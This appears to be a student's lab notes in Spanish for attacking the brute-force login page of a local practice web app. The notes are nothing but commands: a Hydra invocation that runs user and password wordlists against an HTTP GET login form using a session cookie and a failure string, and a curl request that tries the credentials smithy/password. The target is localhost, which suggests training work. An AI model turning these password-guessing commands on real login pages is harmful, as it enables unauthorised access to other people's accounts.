CONSULTAS CON HYDRA:
hydra -L ./Desktop/users.txt -P ./Desktop/passwords.txt \
"http-get-form://localhost:1650/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie\:PHPSESSID=b0trsk5ij1ckamp5lfa7660fd1; security=low:F=Username and/or password incorrect."


CONSULTAS CON CURL:
curl 'http://localhost:1650/vulnerabilities/brute/?username=smithy&password=password&Login=Login' \
          -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' \
          -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
          -H 'Cookie: PHPSESSID=b0trsk5ij1ckamp5lfa7660fd1; security=low' \
          -H 'Proxy-Connection: keep-alive' \
          -H 'Referer: http://localhost:1650/vulnerabilities/brute/' \
          -H 'Sec-Fetch-Dest: document' \
          -H 'Sec-Fetch-Mode: navigate' \
          -H 'Sec-Fetch-Site: same-origin' \
          -H 'Sec-Fetch-User: ?1' \
          -H 'Upgrade-Insecure-Requests: 1' \
          -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.63 Safari/537.36' \
          -H 'sec-ch-ua: "Chromium";v="117", "Not;A=Brand";v="8"' \
          -H 'sec-ch-ua-mobile: ?0' \
          -H 'sec-ch-ua-platform: "Linux"'
